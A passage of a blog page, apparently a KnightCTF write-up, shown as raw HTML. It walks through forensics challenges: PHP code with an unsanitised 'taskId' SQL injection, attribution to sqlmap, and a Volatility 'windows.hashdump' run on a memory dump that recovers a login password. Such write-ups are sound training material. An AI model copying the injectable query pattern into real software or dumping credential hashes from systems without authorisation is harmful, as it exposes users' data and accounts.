href=\"/static/386e27cc56c6baad2008acee071585af/5b93b/image-20240123213707514.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 8.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAi0lEQVQI1z3GywqCUAAAUf//Cwok9IpipqkRZdkDWkVpZQ8xgiCohRC1CVpON6EWhxklefSZl11Wz4jDe8z2FTM5uwyPTeKTw6CwiaRebhGsBV6q08kMgo0g/DYT1f+qxFeX6OIwurnM7iHT0icsTNp7gZ8beDtRaWUadtrAXKpYkpmo6Iu6VPvTpA8NWn976lykIQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/386e27cc56c6baad2008acee071585af/8ac56/image-20240123213707514.webp 240w,\n/static/386e27cc56c6baad2008acee071585af/d3be9/image-20240123213707514.webp 480w,\n/static/386e27cc56c6baad2008acee071585af/e46b2/image-20240123213707514.webp 960w,\n/static/386e27cc56c6baad2008acee071585af/f992d/image-20240123213707514.webp 1440w,\n/static/386e27cc56c6baad2008acee071585af/6ede0/image-20240123213707514.webp 1705w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/386e27cc56c6baad2008acee071585af/8ff5a/image-20240123213707514.png 240w,\n/static/386e27cc56c6baad2008acee071585af/e85cb/image-20240123213707514.png 480w,\n/static/386e27cc56c6baad2008acee071585af/d9199/image-20240123213707514.png 960w,\n/static/386e27cc56c6baad2008acee071585af/07a9c/image-20240123213707514.png 1440w,\n/static/386e27cc56c6baad2008acee071585af/5b93b/image-20240123213707514.png 1705w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/386e27cc56c6baad2008acee071585af/d9199/image-20240123213707514.png\"\n            alt=\"image-20240123213707514\"\n            title=\"image-20240123213707514\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the source code of the application downloaded earlier, we can see code like the following, where if <code class=\"language-text\">taskId</code> exists in the GET request, its value can be executed directly in the SQL query.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span> \n<span class=\"token function\">session_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">include</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"../models/db.php\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskId'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$uuid</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskId'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"SELECT * FROM `tasks` WHERE `uuid` = <span class=\"token interpolation\"><span class=\"token variable\">$uuid</span></span>\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$conn</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'update_task_btn'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskDescription'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskStatus'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$taskDescription</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$conn</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskDescription'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token variable\">$taskStatus</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$conn</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskStatus'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n        <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"UPDATE `tasks` SET `task_desc` = '<span class=\"token interpolation\"><span class=\"token variable\">$taskDescription</span></span>', `task_status` = '<span class=\"token interpolation\"><span class=\"token variable\">$taskStatus</span></span>' WHERE `uuid` = <span class=\"token interpolation\"><span class=\"token variable\">$uuid</span></span>\"</span><span class=\"token punctuation\">;</span>\n        <span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$conn</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$result</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n            <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"Task Updated Successfully. Redirecting...\"</span><span class=\"token punctuation\">;</span>\n            <span class=\"token function\">header</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"refresh:2; url=../views/tasks.php\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span><span class=\"token keyword\">else</span><span class=\"token punctuation\">{</span>\n            <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"Unknown Error. Please contact admin.\"</span><span class=\"token punctuation\">;</span>\n            <span class=\"token keyword\">die</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>Therefore, the correct flag is <code class=\"language-text\">KCTF{sqli_taskId}</code>.</p>\n<h3 id=\"famous-tool-2forensic\" style=\"position:relative;\"><a href=\"#famous-tool-2forensic\" aria-label=\"famous tool 2forensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Famous Tool 2(Forensic)</h3>\n<blockquote>\n<p>What tool did the attacker use to identify the vulnerability of edit task page?\nFlag Format: KCTF{toolname/version}</p>\n</blockquote>\n<p>As you can see immediately from the packets issuing the SQLi requests, <code class=\"language-text\">KCTF{sqlmap/1.7.10#stable}</code> is the correct flag.</p>\n<h3 id=\"something-interestingforensic\" style=\"position:relative;\"><a href=\"#something-interestingforensic\" aria-label=\"something interestingforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Something Interesting(Forensic)</h3>\n<blockquote>\n<p>There’s something interesting. Can you find it?\nFlag Format: KCTF{fl4G}</p>\n</blockquote>\n<p>I couldn’t figure it out because the hint in the prompt was too sparse, but apparently the correct flag was obtained by decoding the encrypted string in <code class=\"language-text\">backup.sql</code> with ROT47.</p>\n<h3 id=\"hidden-pageforensic\" style=\"position:relative;\"><a href=\"#hidden-pageforensic\" aria-label=\"hidden pageforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Hidden Page(Forensic)</h3>\n<blockquote>\n<p>There was a hidden page which was only accessible to root &#x26; was removed from the web app for security purpose. Can you find it?</p>\n</blockquote>\n<p>Reading the application code reveals that there is a page called <code class=\"language-text\">terminal-13337.php</code> that is accessible only to the root user.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 657px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/614c4ac19f86c63a86987db814705a7d/a1253/image-20240123214423979.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 43.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABa0lEQVQoz21SV3aDMBD0OUwRKhQVwNgxxnZw/nL/G012Rcl7Tj7mbQGtZmd0kFLB+AFSG6hCEArkuUCaZciyNILzHSn3MvonhxBijxsOBQ3QlYP7uON8vuBrCLgGi1CXaFyA9QEd5S3DWfR9D+8cpDL/Dj1IGiiVhh9nnMY7np3Fq7e4nTqqH7heR8y9x/MU8LyNeM0zpmlCWTuIN3Y8ODJUmti0A0pjYEwJ3XgYpaClREFRiHVFQs6H6YwQRexl3FuxrEyHFOl4ch7j/YHL6xvn6RNDCGh9i4uvaOWKtFWQq8Y7JMkllyiL5YKDpIGCfmzKCqH1sHWNUJmIzi55Rz1P0ZY6ass9x3n8ttSlVr8ray3j7ckxQUIuHtPF0SThOqM6RcI1xzRdX0Aeka4x21fmNUyFKgyorUPXlHQrsam4R44SA78ya0kGT67zU3s3ZDeFd+eBuvaIbFddNvdZn00vRQapaNLf97fhB0mI/2H6pe0nAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/614c4ac19f86c63a86987db814705a7d/8ac56/image-20240123214423979.webp 240w,\n/static/614c4ac19f86c63a86987db814705a7d/d3be9/image-20240123214423979.webp 480w,\n/static/614c4ac19f86c63a86987db814705a7d/b9f96/image-20240123214423979.webp 657w\"\n              sizes=\"(max-width: 657px) 100vw, 657px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/614c4ac19f86c63a86987db814705a7d/8ff5a/image-20240123214423979.png 240w,\n/static/614c4ac19f86c63a86987db814705a7d/e85cb/image-20240123214423979.png 480w,\n/static/614c4ac19f86c63a86987db814705a7d/a1253/image-20240123214423979.png 657w\"\n            sizes=\"(max-width: 657px) 100vw, 657px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/614c4ac19f86c63a86987db814705a7d/a1253/image-20240123214423979.png\"\n            alt=\"image-20240123214423979\"\n            title=\"image-20240123214423979\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Therefore, <code class=\"language-text\">KCTF{terminal-13337.php}</code> is the correct flag.</p>\n<h3 id=\"db-detailsforensic\" style=\"position:relative;\"><a href=\"#db-detailsforensic\" aria-label=\"db detailsforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>DB Details(Forensic)</h3>\n<blockquote>\n<p>What is the database username &#x26; databasename?</p>\n</blockquote>\n<p>You can tell this one just by reading the code.</p>\n<p>Since it was one of the later questions, maybe it was just a giveaway challenge.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 669px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/63b1529094141b2b3ddad3c440fc46b3/99272/image-20240123214615234.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 58.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABc0lEQVQoz6VSy07DMBDMZ7RqXn47TuKUtgSBekGc4P//Zxg7LSqFSlQcRruJrNmZ2S3meYa1BkoqrNdrrFarf6GIMSIMI7wJ6LsAKSU2ZYmyqlBVNer6PhRN2yIcjnBxBzduYY3G6EyGFCI/aprmzyik0ti/vuPw9oF4eMbWW5JZqETGBxUJv6Fa6vWgL4WC2Y3zEcPjCzwtjyRMpE4pGNGyCjgpcm9ZvZb5X5MIGEvGiTwTtlRihwm2G+D7HsZaDN5g6j0z9RiIMXQI3hGnvuugtIGgO6k1BIedSQtJhT5lx0cxeqq0CMHwXw/dT9AhEiMUBy59zALcEIktuumBIvQVoTHY7Z+oysJymk6qaU82NbfewjvFZdGqXapSBk3KstwQJW1fWE5nImXNjDSsksyI2aWsjILkBWjWjqodt+4YRVKjtINol6X9WIqhuuZqk/VFzf3pJs+o6+rmORXOechkgR8tFd2DXwkX2W1Wec8B38In/TVOx6sCU7cAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/63b1529094141b2b3ddad3c440fc46b3/8ac56/image-20240123214615234.webp 240w,\n/static/63b1529094141b2b3ddad3c440fc46b3/d3be9/image-20240123214615234.webp 480w,\n/static/63b1529094141b2b3ddad3c440fc46b3/a6306/image-20240123214615234.webp 669w\"\n              sizes=\"(max-width: 669px) 100vw, 669px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/63b1529094141b2b3ddad3c440fc46b3/8ff5a/image-20240123214615234.png 240w,\n/static/63b1529094141b2b3ddad3c440fc46b3/e85cb/image-20240123214615234.png 480w,\n/static/63b1529094141b2b3ddad3c440fc46b3/99272/image-20240123214615234.png 669w\"\n            sizes=\"(max-width: 669px) 100vw, 669px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/63b1529094141b2b3ddad3c440fc46b3/99272/image-20240123214615234.png\"\n            alt=\"image-20240123214615234\"\n            title=\"image-20240123214615234\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"api-keyforensic\" style=\"position:relative;\"><a href=\"#api-keyforensic\" aria-label=\"api keyforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>API Key(Forensic)</h3>\n<blockquote>\n<p>What’s the API Key?\nFlag Format: KCTF{API-KEY}</p>\n</blockquote>\n<p>Same as above.</p>\n<p>Even though it was the last question, it may have been the easiest.</p>\n<h2 id=\"digital-forensics\" style=\"position:relative;\"><a href=\"#digital-forensics\" aria-label=\"digital forensics permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Digital Forensics</h2>\n<h3 id=\"osforensic\" style=\"position:relative;\"><a href=\"#osforensic\" aria-label=\"osforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>OS(Forensic)</h3>\n<blockquote>\n<p>My boss, Muhammad, sent me this dump file of a memory. He told me that this OS has a malware virus that runs automatically. I need to find some more information about this OS, and the hacker also created some files in this OS. He gave me a task to solve this within 24 hours. I am afraid. Will you please help me? My boss sent some questions; please solve them on my behalf. There are total 7 challenges in this series. Best of luck.</p>\n<p>What is the OS version?</p>\n<p>Flag Format: KCTF{1.1.1111.11111}</p>\n</blockquote>\n<p>This challenge asked us to identify the OS version from the provided Windows dump file.</p>\n<p>The flag was <code class=\"language-text\">KCTF{7.1.7601.24214}</code>, which includes the version information shown by <code class=\"language-text\">!analyze -v</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 496px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/681e54b18e24b0255358208ac709a2b5/bb630/image-20240121185136134.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 73.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAAByUlEQVQ4y4WTzU7CUBCFeQh1AbT0//+HQgmQGN/BlYmJ8VXcukEIaBDjsx7njJZUFFhMbnub+91zZk47i/UWw+EQeV5gMpkgDEP4vo80TRFFEcqyhOd56Pf7ME3zbHVWbx8Cy1EU30BCkiTRd4Jc14VlWTAMQw8061HgevuJLEv3QCqbTqeYzWZwHEeVtSFngaowy9R2XdcYDAZ7u7QfBIFC22Cux8Cdl827WIxFZYb5fK7qaDEUoOt6Ao7VNuHc7/V6J9V2lpudqmDzq6rCeDxG5LvwHIF6LpLQRxj4vxSfsq6WAzkwGo1QSh9zqaiaw81qWWdI62vklQxLYM3ATgKXrzuNSSXAYVnACVNc3j7BfFjAvH+G9biCcXOH7tWF2P3by3+nnMSx2mUfORDHtiVK8ixqaJP7jBbtnouPWqYd9pC2eTiWC5hB2rNtS4fCCLXzeDQ2HApVFQJkFgkkiBNuItPE5ByM3yU2O+nd94RtsUogi6oOYU0e2/uHGVXL7BPtUhljw37RIp+5T+W8kOFna1jZz8/A7yx+50+hU+YQCKNF9olA9pGtYFE599srDzfPzf4+Np4EmDdQabfbVVhTvIiHD+0fqy+nMsB3PnrWhQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/681e54b18e24b0255358208ac709a2b5/8ac56/image-20240121185136134.webp 240w,\n/static/681e54b18e24b0255358208ac709a2b5/d3be9/image-20240121185136134.webp 480w,\n/static/681e54b18e24b0255358208ac709a2b5/6f16c/image-20240121185136134.webp 496w\"\n              sizes=\"(max-width: 496px) 100vw, 496px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/681e54b18e24b0255358208ac709a2b5/8ff5a/image-20240121185136134.png 240w,\n/static/681e54b18e24b0255358208ac709a2b5/e85cb/image-20240121185136134.png 480w,\n/static/681e54b18e24b0255358208ac709a2b5/bb630/image-20240121185136134.png 496w\"\n            sizes=\"(max-width: 496px) 100vw, 496px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/681e54b18e24b0255358208ac709a2b5/bb630/image-20240121185136134.png\"\n            alt=\"image-20240121185136134\"\n            title=\"image-20240121185136134\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"passwordforensic\" style=\"position:relative;\"><a href=\"#passwordforensic\" aria-label=\"passwordforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Password(Forensic)</h3>\n<blockquote>\n<p>What is the login password of the OS?</p>\n</blockquote>\n<p>It looks like we just need to obtain the OS login password from the memory dump under analysis.</p>\n<p>You could combine WinDbg commands and extract it from the registry information, but that is a hassle, so I used Volatility instead.</p>\n<p>I used the command <code class=\"language-text\">vol3 -f KnightSquad.DMP windows.hashdump</code> in a REMNux environment.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/cd9ac638ab7c70f69c0a339ada2c5289/fbf08/image-20240123215721932.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.499999999999996%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4klEQVQY01WQ2QqDUAxEfRIUF8R9wbV1uVXE9f//bNoJtNCHQ3KHZG4YLZljRM8A1eOF7qHQNDWKokDbtqjrGlVVCWVZous6eJ4Hx3Hguu6P75tVU4PCtu6YXwp9//wYdciy9EOGPM/FnL3v+4iiCHEcC2maCkmSIAzDn66VVSm/84ogCET8VsJhGluWBV3XYRgGTNMU2BPbtgVqWtM0ssTa9z3WdcWyLFBKYZ5nTNMkxjRlBOM4ik44R6jzeppqXGReXByGAfu+4zxP4boubNv2lyUNqHPuOA7c9y3ZMhYavgFOD4ZUi5/H3gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/cd9ac638ab7c70f69c0a339ada2c5289/8ac56/image-20240123215721932.webp 240w,\n/static/cd9ac638ab7c70f69c0a339ada2c5289/d3be9/image-20240123215721932.webp 480w,\n/static/cd9ac638ab7c70f69c0a339ada2c5289/e46b2/image-20240123215721932.webp 960w,\n/static/cd9ac638ab7c70f69c0a339ada2c5289/c76c7/image-20240123215721932.webp 962w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/cd9ac638ab7c70f69c0a339ada2c5289/8ff5a/image-20240123215721932.png 240w,\n/static/cd9ac638ab7c70f69c0a339ada2c5289/e85cb/image-20240123215721932.png 480w,\n/static/cd9ac638ab7c70f69c0a339ada2c5289/d9199/image-20240123215721932.png 960w,\n/static/cd9ac638ab7c70f69c0a339ada2c5289/fbf08/image-20240123215721932.png 962w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/cd9ac638ab7c70f69c0a339ada2c5289/d9199/image-20240123215721932.png\"\n            alt=\"image-20240123215721932\"\n            title=\"image-20240123215721932\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From this, I could determine that the password for the user <code class=\"language-text\">siam</code> was <code class=\"language-text\">squad</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 394px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b9a966b06082e3f704da0b91653d162b/cc097/image-20240123215846068.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    